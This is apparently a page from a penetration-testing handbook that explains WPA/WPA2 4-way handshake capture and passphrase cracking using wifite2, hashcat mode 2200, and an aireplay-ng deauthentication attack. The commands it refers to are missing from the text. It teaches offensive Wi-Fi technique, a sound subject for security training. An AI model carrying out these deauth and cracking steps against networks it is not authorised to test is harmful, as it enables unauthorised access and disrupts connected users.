Capture the 4-Way Handshake
Theorical background
In the WPA/WPA2 section of this book, we learned about the authentication flow and 4-Way handshake that occurs between the access point and the client to generate the PTK used to encrypt data. From what we learned we have now have better understand of how capturing the 4-Way handshake can be used by an attacker to retrieve the Wi-Fi passphrase.
Indeed, eyedropping a 4-Way handshake exchange allows an attacker to retrieve information needed to recreate the PTK (ANonce, SNonce, access point and client MAC addresses). Only the PMK is still needed to recreate the PTK, which can be retrieve using the good passphrase.
An attacker can determine if he found the correct passphrase, using a dictionary attack. By comparing the MIC obtained (from the calculated PTK) with the one that can be found in the 4-Way handshake captured. If both MIC match, these means that the PTK calculated was correct, and thus the PMK was also correct and so the passphrase too.
To perform a dictionary attack to retrieve the passphrase, not all 4 packets of the 4-Way Handshake necessarily need to be collected. At least, we need the second packet containing the SNonce (supplicant nonce) and the 1st or 3st packet containing the ANonce (access point nonce).
wifite2
Wifite2 is an handy tool that can perform various attacks on wireless networks configured with WEP or WPA/WPA2-PSK. The pros of this tools is that it automate the process of monitoring available networks in the perimeter, capturing the 4-way handshake, and then cracking the key.
PKMID attack
Capture 4-way handshake
WPS attacks
Requires the entire aircrack-ng suite installed
--no-pkmid
: do not proceed to PKMID attack.
--pmkid
: only proceed to PKMID attack.
Cracking the hash online
Wifite2 allows attackers to crack the keys without the use of any other tool. Wifite performs an online dictionary attack since a list of keys is tried directly against the AP in an attempt to authenticate to the network.
The image below shows that wifite found several wireless networks in the perimeter. One user seems connected to the EvilCorp network.
Cracking the hash offline
Is is also possible to crack the key offline using Hashcat. Offline cracking, compared to online cracking, is when an attacker does not need to interact with the system directly (the AP) to retrieve the right information.
1. Capture the 4-way handshake
If a 4-way handshake is captured, we need to convert the .cap file found in the /hs
directory in a format hashcat can understand using the hcxpcapngtool
2. Convert the 4-way handshake .cap file
3. Crack the hash offline using hashcat
To crack these hash format
Use mode 2200 in Hashcat
Using airodump and aireplay
Monitoring all wireless networks available, we can see that the targeted NewGenAirways network is running on channel 6. The image also shows that a wireless device is connected to the targeted wireless network with the BSSID B8:0D:F7:D5:79:F7. We want to capture the handshake of a client connecting to this network in order to retrieve the key.
First of all, we want to fix airodump-ng on the channel 6 and put the output into a file that will contain the captured handshake. This step can be done with the command below with wlan0
being in monitor mode.
We are now ready to perform a deauthentication attack in another terminal.
Performing a deauth attack
The main goal of the deauth attack is to force the clients to disconnect from the targeted access point and to reconnect. This allows the attackers to capture the 4-way handshake.
The command below aim to send 50 deauthentication packets to the AP with the BSSID B8:0D:F7:D5:79:F7.
-0:
to specify deauthentication attack
-a
: to specify the BSSID of the targeted access point
-c:
to specify the MAC address of the tageted supplicant (if not specified broadcasting)
--ignore-negative-one
: this flag is sometime needed
The handshake will be captured by airodump-ng.
We can verify that we captured the 4-way handshake correctly using aircrack-ng on the .cap file.
We can now crack the key using aircrack-ng and a list of common passwords.
Last updated